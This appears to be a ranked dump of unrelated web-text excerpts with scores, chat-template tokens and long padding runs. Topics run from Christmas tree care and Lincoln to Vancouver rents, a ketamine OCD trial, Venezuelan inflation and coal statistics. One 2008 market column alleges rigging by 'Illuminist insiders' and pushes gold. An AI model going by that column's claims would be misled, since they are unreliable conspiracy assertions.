_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 62; Score = 1130496.0 +<|begin_of_text|>Fresh Christmas trees are a holiday tradition, loved for their beauty and fresh, outdoorsy fragrance. However, Christmas trees often take the blame for destructive fires that occur during the holiday season. The most effective way to prevent Christmas tree fires is to keep the tree well hydrated. With proper care, a tree should remain fresh for two to three weeks. This may sound easy, but it becomes a problem if your Christmas tree is not drinking water. + +Causes for a Christmas Tree Not Taking Up Water + +Generally, when Christmas trees have problems taking up water, it’s because we tend to add products to the tree itself or the water. Avoid spray-on fire retardants and other products advertised to keep your tree fresh. Similarly, bleach, vodka, aspirin, sugar, lime soda, copper pennies or vodka have little or no effect and some can actually slow water retention and increase moisture loss. + +What works best? Plain old tap water. If you tend to be forgetful, keep a pitcher or watering can near the tree to remind you. + +How to Get a Christmas Tree to Take Up Water + +Cutting a thin sliver from the bottom of the trunk is key to keeping a tree fresh. Keep in mind that if the tree is freshly cut, you don’t need to cut the trunk. However, if the tree has been cut for longer than 12 hours before you put it in water, you must trim ¼ to ½ inch from the bottom of the trunk. + +This is because the bottom of the trunk seals itself with sap after a few hours and can’t absorb water. Cut straight across and not at an angle; an angular cut makes it harder for the tree to take up water. It is also difficult to get a tree with an angular cut to stand upright. Also, don’t drill a hole in the trunk. It doesn’t help. + +Next, a large stand is critical; a Christmas tree can drink up to one quart of water for each inch of stem diameter. The National Christmas Tree Association recommends a stand with a one-gallon capacity. Never trim the bark to accommodate a too-tight stand. The bark helps the tree take up water. + +Christmas Tree Watering Tips + +Start with a fresh Christmas tree. There’s no way to hydrate a dried up tree, even if you trim the bottom. If you aren’t sure about freshness, pull a branch slowly through your fingers. A few dry needles are no reason for concern, but look for a fresher tree if a large number of needles are loose or brittle. + + +================================================================================ +Rank = 63; Score = 1089536.0 +<|begin_of_text|>These capitalists generally act harmoniously and in concert, to fleece the people. + +—Abraham Lincoln, from his first speech as an Illinois state legislator, 1837 + +Everyone now is more or less a Socialist. + +—Charles Dana, managing editor of the New York Tribune, and Lincoln’s assistant secretary of war, 1848 + +The workingmen of Europe feel sure that, as the American War of Independence initiated a new era of ascendancy for the middle class, so the American Antislavery War will do for the working classes. They consider it an earnest of the epoch to come that it fell to the lot of Abraham Lincoln, the single-minded son of the working class, to lead his country through the matchless struggle for the rescue of an enchained race and the reconstruction of a social world. + +—Karl Marx and the First International Workingmen’s Association to Lincoln, 1864 + +ON DECEMBER 3, 1861, a former one-term congressman, who had spent most of the past dozen years studying dissident economic theories, mounting challenges to the existing political order and proposing ever more radical responses to the American crisis, delivered his first State of the Union address as the sixteenth president of the United States. + +Since assuming office eight months earlier, this new president had struggled, without success, first to restore the severed bonds of the Union and then to avert a wrenching civil war. Now, eleven southern slave states were in open and violent rebellion against the government he led. + +His inaugural address of the previous spring had closed with a poignant reflection on the prospect of eventual peace, imagining a day when the Union might again be touched “by the better angels of our nature.” But, now, in the last month of what Walt Whitman would recall as America’s “sad, distracted year”—“Year that suddenly sang by the mouths of the round-lipp’d cannons”—the better angels seemed to have deserted the continent. Every effort to restore the republic had been thwarted. There was no room for accommodation with the Confederate States of America. Fort Sumter had been fired upon and the flag of southern rebellion now flew above Charleston Harbor. Virginia, the cradle of presidents, the state of Washington, Jefferson and Madison, had joined the revolt and assembled a capital of the Confederacy less than 100 miles from Washington. Hundreds of Union and Confederate soldiers had died, with thousands more wounded at the First Battle of Bull Run. Armies had been reorganized and generals replaced with the recognition that this was no skirm +================================================================================ +Rank = 64; Score = 1081344.0 +<|begin_of_text|>Finding a place to rent in Metro Vancouver is tough enough. + +But almost half of those who have found a place are straining their finances to keep those roofs over their heads, according to data contained in Wednesday’s Census release. + +Coverage of renting in Vancouver on Globalnews.ca: + +This week, Statistics Canada released “Housing in Canada: key results from the 2016 Census,” a dataset showing how much the country’s housing landscape has changed over the past decade. + +Data contained in the release showed that just over 43 per cent of renters are spending 30 per cent or more of their income on shelter in the Vancouver Census Metropolitan Area (CMA). + +The CMA covers an area that includes municipalities such as Vancouver, Richmond, Surrey, North Vancouver and Langley. + +The Census release showed that, out of 348,700 renters identified in the Census, 150,505 (43.2 per cent) were spending 30 per cent or more of their income on shelter costs in 2015. + +The Canada Mortgage and Housing Corporation (CMHC) says housing can be considered affordable if it takes up less than 30 per cent of before-tax household income. + +Therefore, more than 43 per cent of residents in the Vancouver CMA were living in housing that can’t necessarily be considered affordable. + +READ MORE: North Van developer says the industry needs to do more to help with the housing crisis + +Census data compiled by Andy Yan, director of the SFU City Program, shows varying levels of renters living in “unaffordable” housing across Metro Vancouver’s municipalities. + +In the City of Vancouver, 44.2 per cent of renters were living in housing that took up 30 per cent or more of their income. + +The highest share of renters living in housing they couldn’t afford was observed in Lions Bay, where the share was 66.7 per cent. + +The lowest share was witnessed in Anmore, where it was 25 per cent. + +But that’s not the only figure suggesting that Metro Vancouverites are spending more than they can technically afford on a place to live. + +Data crunched by the B.C. Non-Profit Housing Association (BCNPHA) shows that 22 per cent of renters were spending at least half of their before-tax income on shelter. + +Either way, the share of renters paying more than 30 per cent is significant, said Nathanael Lauster, a UBC professor and the author of The Death and Life of the Single-Family House: Lessons from Vancouver on Building a Livable City. + + +================================================================================ +Rank = 65; Score = 1056768.0 +<|begin_of_text|>Where did the gains from productivity go? Well, they went to the top. Household income, adjusted for inflation, has grown 12X more for the top 1% than for the middle 20%... and 24X more than the bottom 20%. + +The full story of income inequality cannot simply be told with wages, where the 40-year growth gap between the top 10% and the rest is "only" about two-to-one. + +To understand the full story, you have to look at capital income -- from assets like housing and stocks and bonds. This is where income growth for the top 1% has positively exploded, taking income inequality to record highs. + +This is not a new trend. This is an old trend going back to before the Reagan administration. Since 1979, the top 5% took home more than half of total income growth. The top 1% took nearly 40%. + +EPI's conclusion that health care costs and technology have nothing to do with stagnating wages for the middle class is controversial (see here and here for other takes). But its diagnosis for the three "wage gaps" is still compelling. Slide here, graphs to follow. + +First, let's look at the gap between the super-super rich and the rest. About 60% of the increase in the top 1%'s share of total income seems to come from the expansion of the financial sector and the explosion in executive pay in non-financial compensation. + +At the same time that their incomes have grown, effective tax rates on the super-super rich have fallen, especially since our laws give preference to income from capital gains. This is huge, because the top 1% has controlled more than 40% of stock market wealth since the 1980s. The next 9% owns another 40%. Stock wealth hasn't exactly democratized. + +Since 1960, average effective tax rates have fallen dramatically for the top 0.1% -- much of it thanks to preferences for capital gains income. Progressive taxation won't fix the middle class crisis, Mishel pointed out to me over the phone, but it can discourage sky-high CEO salaries and provide more public funds to pay for infrastructure, education, and a safety net. + +We're moving from the tippy-top of income to the very bottom here. As taxes have fallen at the top, the minimum wage has fallen at the bottom. In 1964, the minimum wage was about 50% of the average worker's hourly earnings. +================================================================================ +Rank = 66; Score = 1036288.0 +<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. + +The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: + +Loading... + +fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; + +foliate papillae, which are ridges and grooves toward the back of the tongue; + +circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. + +You can’t taste food unless it’s mixed with your saliva + +Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 67; Score = 1032192.0 +<|begin_of_text|>Nightmarish Financial Numbers + +Minyanville.com had the headline, “Velocity of Money Comes to a Standstill.” The report starts off with the news that “Current consumption, which at $8.2 trillion is around 70% of GDP, has fallen $150 billion from last year,” and that investment, which represents things like building factories, is $1.3 trillion or 11% of GDP, and down 23.3% from last year.” + +This is certainly bad news, although I am always leery of the concept of velocity, as it is just the plug number that makes Fisher’s famous equation (MV = PQ) work out, namely that the Money supply times the turnover of the money (Velocity) equals the Quantity of things sold times the Price of those things that were sold. Simple. + +So since the Money supply (as measured by M2) is growing at almost 9%, Prices overall (as measured by the broad CPI) are not growing very much, and the Quantity of goods sold is way down as consumers stop consuming since they are out of money and credit, then Velocity must, by arithmetical necessity, be going down. Now do you know something that you didn’t already know? + +But perhaps this seeming fascination with velocity has something to do with why Bloomberg.com reports that “U.S. household wealth fell in the first quarter by $1.3 trillion, extending the biggest slump on record, as home and stock prices dropped.” Yikes! And in just the first three months of the year! + +You may be thinking to yourself, “Well, since the Worthless Mogambo Idiot (WMI) goes ballistic at the drop of a hat these days, probably as a result of his having such a tenuous and apparently transitory grasp of reality, maybe he is just over-reacting, and this is not so much.” + +If you are one of those people who thinks such things, then I laugh – Hahaha! – in your face, and in response to the quizzical look on your face at my sudden rude arrogance, I hold up the rest of the article where it says, “Net worth for households and non-profit groups” is a nice, tidy $50.4 trillion, which seems like a lot of money, but which is actually the “lowest level since 2004,” and which was down from $51.7 trillion in the fourth quarter. + +For some reason, they add, “The government began keeping quarterly records in 1952,” +================================================================================ +Rank = 68; Score = 1011712.0 +<|begin_of_text|>Serotonin reuptake inhibitors (SRIs), the first-line pharmacological treatment for obsessive-compulsive disorder (OCD), have two limitations: incomplete symptom relief and 2-3 months lag time before clinically meaningful improvement. New medications with faster onset are needed. As converging evidence suggests a role for the glutamate system in the pathophysiology of OCD, we tested whether a single dose of ketamine, a non-competitive N-methyl-D-aspartate (NMDA) glutamate receptor antagonist, could achieve rapid anti-obsessional effects. In a randomized, double-blind, placebo-controlled, crossover design, drug-free OCD adults (n=15) with near-constant obsessions received two 40-min intravenous infusions, one of saline and one of ketamine (0.5 mg/kg), spaced at least 1-week apart. The OCD visual analog scale (OCD-VAS) and the Yale-Brown Obsessive-Compulsive Scale (Y-BOCS) were used to assess OCD symptoms. Unexpectedly, ketamine's effects within the crossover design showed significant (p<0.005) carryover effects (ie, lasting longer than 1 week). As a result, only the first-phase data were used in additional analyses. Specifically, those receiving ketamine (n=8) reported significant improvement in obsessions (measured by OCD-VAS) during the infusion compared with subjects receiving placebo (n=7). One-week post-infusion, 50% of those receiving ketamine (n=8) met criteria for treatment response (≥35% Y-BOCS reduction) vs 0% of those receiving placebo (n=7). Rapid anti-OCD effects from a single intravenous dose of ketamine can persist for at least 1 week in some OCD patients with constant intrusive thoughts. This is the first randomized, controlled trial to demonstrate that a drug affecting glutamate neurotransmission can reduce OCD symptoms without the presence of an SRI and is consistent with a glutamatergic hypothesis of OCD.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 69; Score = 1007616.0 +<|begin_of_text|>EspañolThe value of the Venezuelan bolívar has plummeted in the past month, depreciating from 102.56 to 159.02 per US dollar on the black-market exchange. November’s decline indicates that Venezuela now flirts with hyperinflation. + +The rule of thumb among economists is that hyperinflation occurs when inflation — the declining purchasing power of a currency as measured by a rise in the price level — exceeds 50 percent on a monthly basis. As deduced from the black-market exchange rate and the US Consumer Price Index, Venezuela’s inflation for November reached 55.27 percent.* Even the highest denomination of the bolívar, the 100 Bs. note, is now worth a mere 62.9 US cents. + +Subscribe to our daily newsletter Youtube + +If Venezuela were to continue November’s free-fall trajectory for the bolívar, its annual compounded inflation would reach 19,633 percent. + +While DolarToday is the most commonly referenced website for the bolívar’s informal exchange rates, Aguacate Verde and Lechuga Verde both uphold the trend (at 146 Bs. per US dollar). Of the three, DolarToday is the only one that offers a publicly available data record (Excel), enabling comparisons between past and present exchange rates. + +The Bolívar’s Disappearing Act + +In a country with three fixed official exchange rates — all with rationed supplies of foreign currencies — the informal rate has become the most accurate gauge of the bolívar’s underlying purchasing power. + +“The black market rate is a very good indicator of what the exchange rate should be,” says Boris Ackerman, an economist and professor at Simon Bolívar University in Caracas. “Public expectations and speculation continue to drive the rate up despite strict financial controls enacted by the government.” + +In an economy defined by crisis, Venezuelans are scrambling from the bolívar to take refuge in the US dollar, which offers a relatively more stable alternative and store of value. In response, President Nicolás Maduro has worked to steadily decrease the availability of US dollars within the country, even going so far as to outlaw transactions in greenbacks. + +This year, the Chavista regime also introduced the third SICAD II rate, in an attempt to curb the thriving black market. However, the measure has since backfired, and the black-market exchange rate has more than doubled since SICAD II’s introduction in March. + +Venezuela’s financial woes have come under immense criticism, including from prominent outlets such as the +================================================================================ +Rank = 70; Score = 1003520.0 +<|begin_of_text|>Societe Generale Societe Generale's Albert Edwards has warned for some time that we are on the precipice of deflation. + +But in his new note to clients, he seems utterly bemused. Markets just don't seem to care. + +"Markets remain stoic about the risks of outright deflation in the US and eurozone for one very simple reason," he writes. + +"They simply do not believe a recession that would trigger outright deflation is on the horizon. Quite the reverse - they believe with all their heart that we are at the start of a self-sustained recovery. That is despite the fact that the US recovery is already noticeably longer than average, and that the classic signs of old age, such as rapidly slowing productivity growth and stagnant corporate profits, can clearly be seen." + +Market expectations of inflation — via the 10-year bond market — has "remained entrenched" above 2% for more than a year, Edwards writes. + +"A chasm is growing between reality, both on a core and headline basis, and expectations," he says. "If investors begin to doubt the economy recovery then they will no longer be able to ignore the lurking deflationary threat. Rapid market moves would ensue." + +Check out Edwards' chart:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 71; Score = 999424.0 +<|begin_of_text|>Bob Chapman | October 29, 2008 + +Down go consumer confidence and real estate values to all-time lows, but, nevertheless, up goes the Dow undaunted, claiming its second largest point gain ever as the counterintuitive insider trading beat goes on and on and on, ad nausea. Insiders get wealthy, and the non-insiders chasing them get annihilated. This has been the story on Wall Street for over a century. Do you think it was merely some sort of serendipitous coincidence that the dark pool of liquidity, known as Project Turquoise, was set to be activated near the end of August, just in time for all the Illuminist insiders to enjoy the profitable fireworks as volatility reached all-time highs, so that all of their nefarious trading could be done in unregulated secrecy? We can assure you that there are no coincidences on Wall Street. There is only rampant, rampaging insider trading and fiendish manipulation. + +Any time they think they are in need of a good fleecing, all the poor sheople have to do is get back into the general stock markets where their Illuminist shearers will be more than happy to oblige them. We absolutely guarantee that the pink of your sheople skin will be showing as all your wool is shaved off right down to the hair follicles. You've probably heard about "pink flamingos." Well, now we are going to see a lot of pink sheople wandering around aimlessly, wondering where all their vaporized money went, as they are prepared for the big slaughter while the Big Sting Two goes into its next phase. You need to protect yourself with gold, silver and their now bargain-basement related shares, unless of course the color pink flatters you. + +The Dow, powered by its PPT anti-gravity machine, and in the face of some of the worst economic news of all time, still somehow managed to tack on an unbelievable, mind-blowing and stupefying 889.35 points as the Conference Board Consumer Confidence Index dropped off a cliff from September's 61.4 to October's 38, an all-time low (the "experts" expected 52), as the Standard & Poor's/Case-Shiller 20-city housing index dropped 16.6 percent in August from a year ago, the largest decline on record going back to 2000, and as the smaller, 10-city index, fell 17.7 percent, the biggest decline in its 21 +================================================================================ +Rank = 72; Score = 991232.0 +<|begin_of_text|>Wednesday, August 26, 2009 + +The United States Office of Management and Budget (OMB) is predicting that the national debt of the US will double in 10 years. Meanwhile, the Congressional Budget Office (CBO) has raised its forecast of the 10-year cumulative budget deficit to US$7.137 trillion, due to increased spending. Both offices released reports on Tuesday. + +"Over all, it underscores the dire fiscal situation that we inherited and the need for serious steps to put our nation back on a sustainable fiscal path," wrote Peter R. Orszag, President Barack Obama's budget director. + +"I know that there will be some who say this report proves that we cannot afford health reform. I think that has it backward," Orszag said in a conference call. + +The CBO report predicts that public debt will exceed 61% of gross domestic product (GDP) by the end of 2010 while continuing to rise to 68% of GDP by the end of 2019. + +"If anyone had any doubts that this burden on future generations is unsustainable, they're gone," said Senator Mitch McConnell, the Senate minority leader. + +"Today's budget numbers send a clear signal that the time for putting off tough choices is over and the time to act is now," said the chairman of the Senate Budget Committee, Kent Conrad. + +"While the U.S. health care system does need to be reformed, we cannot ignore the fiscal realities of our situation," said Senator Judd Gregg who is also on the Senate Budget Committee. "We must proceed with extreme caution before putting in place a huge and costly new program that will threaten our economy and the future of our children." + +"The administration has always said that you have to get deficits under 3 percent of GDP to be safe. They now admit that they will not in the next 10 years," commented Douglas Holtz-Eakin, a former director of the CBO. "I'm stunned at how hard they have worked to bury this." + +Sources<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 991232.0 +<|begin_of_text|>In macroeconomic models, if everything works perfectly -- if all markets clear at all points in time, prices are fully and instantaneously flexible, people have the information they need, and so on -- then monetary policy will have no affect on real variables such as output and employment. Only nominal variables such as the price level will change. This is known as monetary neutrality. + +In order to get non-neutrality, i.e. in order to make it so that changes in the money supply can change real output and employment in a theoretical model, there must be a friction of some sort. One popular friction is price/wage rigidity, but it is not the only type of friction that can generate non-neutralities. Any friction that prevents optimal and instantaneous response to a shock will overcome neutrality and restore the ability of the Fed to affect the course of the real economy. + +The point I want to emphasize is that the optimal monetary policy rule depends upon the underlying friction that is being used to generate non-neutralities in the theoretical model. For example, Calvo type price rigidity combined with some sort of social objective function such as maximizing the welfare of the representative household often gives you something that resembles the standard Taylor rule (though whether the level and/or the growth rates of price and output belong on the right-hand side of the Taylor rule depends upon the nature of the friction, i.e. even in this case the standard Taylor rule may not be the optimal rule). + +I am willing to believe that during the Great Moderation the standard Taylor rule may have at least been close to the optimal rule. If you believe price frictions were the source of the mild fluctuations we had during that time, then theory tells us that's possible. What puzzles me is why people think the same rule should work now. I don't think that Calvo type price rigidities are the reason for the problems we are having right now, and hence this does not give us much insight and explanatory power for the Great Recession. Mild price sluggishness is plainly and simply not the dominant friction at work right now, and if that is the case, why would we think the same monetary policy rule should be optimal? If, in fact, there has been a switch in the dominant type of friction affecting the economy -- and I would argue there has been -- it would be quite remarkable for the same monetary policy rule to be optimal in both situations. + +So, I have to agree with Paul Krugman: + +Self-contradictory Fed Bashing: David Glasner continues to be unhappy with +================================================================================ +Rank = 74; Score = 987136.0 +<|begin_of_text|>The Annual Coal Report (ACR) provides annual data on U.S. coal production, number of mines, productive capacity, recoverable reserves, employment, productivity, consumption, stocks, and prices. All data for 2017 and previous years are final. + +Highlights for 2017: + +U.S. coal production increased 6.4% year over year to 774.6 million short tons (MMst). + +The total productive capacity of U.S. coal mines was 1,058.6 MMst, a decrease of 0.9% from the 2016 level. + +The average number of employees at U.S. coal mines increased 2.4% from the 2016 level to 53,051 employees. + +U.S. coal mining productivity, as measured by average production per employee hour, decreased 0.9% from the 2016 level to 6.55 short tons per employee hour. + +U.S. coal consumption decreased 1.9% from the 2016 level to 716.9 MMst. The electric power sector accounted for about 92.8% of the total U.S. coal consumed in 2017. + +Average sales price of bituminous coal was $55.60 per short ton, a 14.9% increase from the 2016 level. The average sales price of subbituminous coal was $14.29 per short ton, a 3.6% decrease from the 2016 level. The average sales price of thermal coal decreased by 3.0% from the 2016 level to $26.53 per short ton., The average sales price of metallurgical coal increased 61.76% from the 2016 level to $132.82 per short ton. + +Total U.S. coal stocks ended at 167.0 MMst, 13.7% lower than at the same time in 2016. Electric power coal stocks decrease by 24.8 MMst to 137.7 MMst at the end of 2017. + +Contact: + +Coal Data Contacts<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 75; Score = 987136.0 +<|begin_of_text|>Over the last year, and, in fact, over the last five years, nominal wage growth has been slow—slow by historic standards and slow relative 